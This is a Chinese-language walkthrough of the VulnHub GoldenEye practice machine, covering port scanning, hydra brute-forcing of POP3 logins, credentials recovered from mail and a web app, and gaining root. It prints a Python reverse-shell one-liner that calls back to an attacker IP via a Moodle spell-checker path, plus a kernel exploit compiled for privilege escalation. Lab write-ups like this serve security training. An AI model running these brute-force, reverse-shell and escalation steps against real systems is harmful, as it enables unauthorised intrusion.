前言
⏰时间:2023.7.15
🗺️靶机地址:https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝
信息收集
masscan扫端口
nmap扫服务
┌──(root㉿kali)-[/home/eric/myfile]
└─# nmap -sS -A -T4 -v -p 25,80,55007,55006 192.168.58.148
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:22:34
| Not valid after: 2028-04-21T03:22:34
| MD5: cd4a:d178:f216:17fb:21a6:0a16:8f46:c8c6
|_SHA-1: fda3:fc7b:6601:4746:96aa:0f56:b126:1c29:36e8:442c
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after: 2028-04-23T03:23:52
| MD5: d039:2e71:c76a:2cb3:e694:ec40:7228:ec63
|_SHA-1: 9d6a:92eb:5f9f:e9ba:6cbd:dc93:55fa:5754:219b:0b77
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: SASL(PLAIN) UIDL USER PIPELINING AUTH-RESP-CODE RESP-CODES TOP CAPA
55007/tcp open pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after: 2028-04-23T03:23:52
| MD5: d039:2e71:c76a:2cb3:e694:ec40:7228:ec63
|_SHA-1: 9d6a:92eb:5f9f:e9ba:6cbd:dc93:55fa:5754:219b:0b77
|_pop3-capabilities: PIPELINING STLS USER UIDL SASL(PLAIN) CAPA RESP-CODES TOP AUTH-RESP-CODE
MAC Address: 00:0C:29:FE:2B:90 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.021 days (since Sat Jul 15 21:30:12 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.28 ms severnaya-station.com (192.168.58.148)
NSE: Script Post-scanning.
Initiating NSE at 22:00
Completed NSE at 22:00, 0.00s elapsed
Initiating NSE at 22:00
Completed NSE at 22:00, 0.00s elapsed
Initiating NSE at 22:00
Completed NSE at 22:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.93 seconds
Raw packets sent: 27 (1.982KB) | Rcvd: 19 (1.454KB)
访问80端口
提示访问/sev-home/登录
查看源码
工具网站 https://forum.ywhack.com/coding.php
html解码为:InvincibleHack3r
登录后提示pop3非默认端口
查看源码
POP3爆破
已知用户名Boris和Natalya,而且提示修改默认密码,估计可以爆破出来
hydra -L 1.txt -P /usr/share/wordlists/fasttrack.txt 192.168.58.148 -s 55007 pop3
[55007][pop3] host: 192.168.58.148 login: boris password: secret1!
[55007][pop3] host: 192.168.58.148 login: natalya password: bird
nc 192.168.58.148 55007 进入
user boris
pass secret1!
list #显示邮件数量
retr 1、2、3 #选择读取哪封邮件
boris中的邮件没啥东西,natalya中发现如下信息
在本地/etc/hosts文件中添加域名severnaya-station.com
访问severnaya-station.com/gnocertdir
username: xenia
password: RCP90rulez!
登录后在message找到doak的信息
尝试爆破doak的pop3
username: dr_doak
password: 4England!
登录后拿到一个文件
解码为 xWinter1995x! ,登录admin
反弹shell
先得把这个设置为PSpellShell,save
在system path的path to aspell中写入payload
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.128",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
kali监听 nc -nvlp 5555
在这里谁便写点东西,点击红框按钮,负责检测拼写的,点击即可收到shell
python 开启交互shell
查看版本
搜到exp
目标没有gcc,有cc
将exp传到目标
cc 37292.c -o exp
./exp 即可提权